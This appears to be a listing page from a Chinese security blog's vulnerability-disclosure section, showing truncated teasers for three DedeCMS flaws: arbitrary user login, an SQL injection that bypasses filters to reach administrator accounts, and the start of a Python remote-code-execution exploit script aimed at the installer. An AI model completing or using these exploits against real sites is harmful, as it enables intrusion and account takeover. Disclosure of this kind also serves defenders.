• Dedecms任意用户登录

    Dedecms任意用户登录
    ##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserID")); $this->M_LoginTime = GetCookie("DedeLoginTime"); $this->fields = array(); $this->isAdmin = FALSE; if(empty($thi...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:799次 | 标签:
  • DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)

    DEDECMS 20150618 注入一枚(过防注入\可注入管理员账户)
    作者:′雨。 首先来看一下 function XSSClean($val) {[/align]     global $cfg_soft_lang;      if($cfg_soft_lang=='gb2312') gb2utf8($val);      if (is_array($val))      {          while (list($key) = each($val))          {              if(in_array($key,array('tags','body','dede_fields','dede_addonfields','dopost','introduce'))) continue;              $val[$...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:5,223次 | 标签:
  • dedecms远程代码执行利用脚本

    dedecms远程代码执行利用脚本
    转自90sec@Joseph #! /usr/bin/env python #coding=utf-8 #Joseph(小续)   import requests import sys import re def main():     try:         url="http://"+sys.argv[1].strip('http://')     except IndexError:         print '''         poc: dede.py [url]http://www.baidu.com/[/url]         '''     payload="/install/index.php.bak?step=11&a...阅读全文
    作者:unhonker | 分类:漏洞公布 | 阅读:5,631次 | 标签: